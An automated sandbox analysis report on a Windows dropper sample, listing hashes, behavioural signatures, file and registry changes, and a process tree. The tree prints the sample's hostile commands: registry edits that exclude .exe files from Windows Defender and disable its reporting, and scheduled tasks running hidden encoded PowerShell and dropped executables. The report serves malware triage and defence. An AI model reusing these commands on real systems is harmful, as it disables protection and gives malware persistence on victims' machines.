Analysis
-
max time kernel
90s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
27-10-2022 16:51
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
7cd4ca0bedb444ad408d61114f7af4ba
-
SHA1
1acf38f5c49906f9c6399b9982a042d2d62eac87
-
SHA256
e4a445576cdb625b8d6b4da226f0a19e6b6a7e85892f88614cdc94eb5140df24
-
SHA512
c4e6f6338ef1b0b3c70056d158fea7f9bb6baee89ccf14d62330bb29173cdf35ed3522389857ca1d37aea584a2d841888e01df38e8608b86187f586e1bb95fb4
-
SSDEEP
196608:91OZ2vY/eUwt9gTHGC6z0IB9GFlKpoKvOYuavElHDuQ/3:3OQ4J0YiYQ9GgmYurlHDRP
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 62 388 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 4928 Install.exe 4916 Install.exe 3436 pebsMbu.exe 4832 CzSJLdI.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation CzSJLdI.exe -
Loads dropped DLL 1 IoCs
pid Process 388 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json CzSJLdI.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json CzSJLdI.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini CzSJLdI.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 CzSJLdI.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 CzSJLdI.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_A49E2928C282F3D7B74BA1083F81B152 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7D7374C3BD488A38BC34DD9B008EDC62 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_7987E17ED77D800093D5BF3096E78D98 CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 CzSJLdI.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol pebsMbu.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini pebsMbu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F CzSJLdI.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA CzSJLdI.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CzSJLdI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja CzSJLdI.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CzSJLdI.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi CzSJLdI.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak CzSJLdI.exe File created C:\Program Files (x86)\mbQXQWfiU\YNpopAg.xml CzSJLdI.exe File created C:\Program Files (x86)\yaZvCAUzKqxU2\hgtOwknLRPAog.dll CzSJLdI.exe File created C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\udlgYnO.xml CzSJLdI.exe File created C:\Program Files (x86)\ZsZOnrmVuUzLFCeGJOR\IuJrXoy.dll CzSJLdI.exe File created C:\Program Files (x86)\pqzHHOUJlDLoC\UBHgBPs.dll CzSJLdI.exe File created C:\Program Files (x86)\mbQXQWfiU\gOkLPo.dll CzSJLdI.exe File created C:\Program Files (x86)\yaZvCAUzKqxU2\nJwiuKL.xml CzSJLdI.exe File created C:\Program Files (x86)\pqzHHOUJlDLoC\FuYVZxE.xml CzSJLdI.exe File created C:\Program Files (x86)\LNUBGVQNDOUn\OaBMxKU.dll CzSJLdI.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\JApWNoHZsVVCavdbE.job schtasks.exe File created C:\Windows\Tasks\VifYLfsFUZBOnFr.job schtasks.exe File created C:\Windows\Tasks\WxeKxhacHpvHIAGHf.job schtasks.exe File created C:\Windows\Tasks\bvlIjxbhjqoskMIGsW.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1560 schtasks.exe 1276 schtasks.exe 3904 schtasks.exe 4536 schtasks.exe 960 schtasks.exe 4912 schtasks.exe 2156 schtasks.exe 756 schtasks.exe 3228 schtasks.exe 3564 schtasks.exe 2576 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" CzSJLdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" CzSJLdI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" CzSJLdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" CzSJLdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer CzSJLdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket CzSJLdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ CzSJLdI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
pid Process 432 powershell.EXE 432 powershell.EXE 4952 powershell.exe 4952 powershell.exe 388 powershell.exe 388 powershell.exe 4260 powershell.EXE 4260 powershell.EXE 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe 4832 CzSJLdI.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 432 powershell.EXE Token: SeDebugPrivilege 4952 powershell.exe Token: SeDebugPrivilege 388 powershell.exe Token: SeDebugPrivilege 4260 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4540 wrote to memory of 4928 4540 file.exe 83 PID 4540 wrote to memory of 4928 4540 file.exe 83 PID 4540 wrote to memory of 4928 4540 file.exe 83 PID 4928 wrote to memory of 4916 4928 Install.exe 84 PID 4928 wrote to memory of 4916 4928 Install.exe 84 PID 4928 wrote to memory of 4916 4928 Install.exe 84 PID 4916 wrote to memory of 3956 4916 Install.exe 85 PID 4916 wrote to memory of 3956 4916 Install.exe 85 PID 4916 wrote to memory of 3956 4916 Install.exe 85 PID 4916 wrote to memory of 1556 4916 Install.exe 88 PID 4916 wrote to memory of 1556 4916 Install.exe 88 PID 4916 wrote to memory of 1556 4916 Install.exe 88 PID 3956 wrote to memory of 1100 3956 forfiles.exe 89 PID 3956 wrote to memory of 1100 3956 forfiles.exe 89 PID 3956 wrote to memory of 1100 3956 forfiles.exe 89 PID 1100 wrote to memory of 4256 1100 cmd.exe 90 PID 1100 wrote to memory of 4256 1100 cmd.exe 90 PID 1100 wrote to memory of 4256 1100 cmd.exe 90 PID 1556 wrote to memory of 4692 1556 forfiles.exe 92 PID 1556 wrote to memory of 4692 1556 forfiles.exe 92 PID 1556 wrote to memory of 4692 1556 forfiles.exe 92 PID 1100 wrote to memory of 3892 1100 cmd.exe 91 PID 1100 wrote to memory of 3892 1100 cmd.exe 91 PID 1100 wrote to memory of 3892 1100 cmd.exe 91 PID 4692 wrote to memory of 1476 4692 cmd.exe 94 PID 4692 wrote to memory of 1476 4692 cmd.exe 94 PID 4692 wrote to memory of 1476 4692 cmd.exe 94 PID 4692 wrote to memory of 2148 4692 cmd.exe 93 PID 4692 wrote to memory of 2148 4692 cmd.exe 93 PID 4692 wrote to memory of 2148 4692 cmd.exe 93 PID 4916 wrote to memory of 2156 4916 Install.exe 95 PID 4916 wrote to memory of 2156 4916 Install.exe 95 PID 4916 wrote to memory of 2156 4916 Install.exe 95 PID 4916 wrote to memory of 316 4916 Install.exe 97 PID 4916 wrote to memory of 316 4916 Install.exe 97 PID 4916 wrote to memory of 316 4916 Install.exe 97 PID 432 wrote to memory of 2908 432 powershell.EXE 101 PID 432 wrote to memory of 2908 432 powershell.EXE 101 PID 4916 wrote to memory of 1836 4916 Install.exe 112 PID 4916 wrote to memory of 1836 4916 Install.exe 112 PID 4916 wrote to memory of 1836 4916 Install.exe 112 PID 4916 wrote to memory of 756 4916 Install.exe 114 PID 4916 wrote to memory of 756 4916 Install.exe 114 PID 4916 wrote to memory of 756 4916 Install.exe 114 PID 3436 wrote to memory of 4952 3436 pebsMbu.exe 118 PID 3436 wrote to memory of 4952 3436 pebsMbu.exe 118 PID 3436 wrote to memory of 4952 3436 pebsMbu.exe 118 PID 4952 wrote to memory of 1216 4952 powershell.exe 120 PID 4952 wrote to memory of 1216 4952 powershell.exe 120 PID 4952 wrote to memory of 1216 4952 powershell.exe 120 PID 1216 wrote to memory of 2972 1216 cmd.exe 121 PID 1216 wrote to memory of 2972 1216 cmd.exe 121 PID 1216 wrote to memory of 2972 1216 cmd.exe 121 PID 4952 wrote to memory of 1100 4952 powershell.exe 122 PID 4952 wrote to memory of 1100 4952 powershell.exe 122 PID 4952 wrote to memory of 1100 4952 powershell.exe 122 PID 4952 wrote to memory of 1584 4952 powershell.exe 123 PID 4952 wrote to memory of 1584 4952 powershell.exe 123 PID 4952 wrote to memory of 1584 4952 powershell.exe 123 PID 4952 wrote to memory of 4620 4952 powershell.exe 124 PID 4952 wrote to memory of 4620 4952 powershell.exe 124 PID 4952 wrote to memory of 4620 4952 powershell.exe 124 PID 4952 wrote to memory of 4708 4952 powershell.exe 125 PID 4952 wrote to memory of 4708 4952 powershell.exe 125
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4540 -
C:\Users\Admin\AppData\Local\Temp\7zS72A4.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Users\Admin\AppData\Local\Temp\7zS7861.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1100 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4256
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3892
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1556 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2148
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1476
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gCOjHEOfu" /SC once /ST 03:50:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2156
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gCOjHEOfu"4⤵PID:316
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gCOjHEOfu"4⤵PID:1836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvlIjxbhjqoskMIGsW" /SC once /ST 18:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\pebsMbu.exe\" Fi /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:756
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2908
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4836
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\pebsMbu.exeC:\Users\Admin\AppData\Local\Temp\mlVNeEAaSntXOMWdx\WVOoIgfXlsowUee\pebsMbu.exe Fi /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3436 -
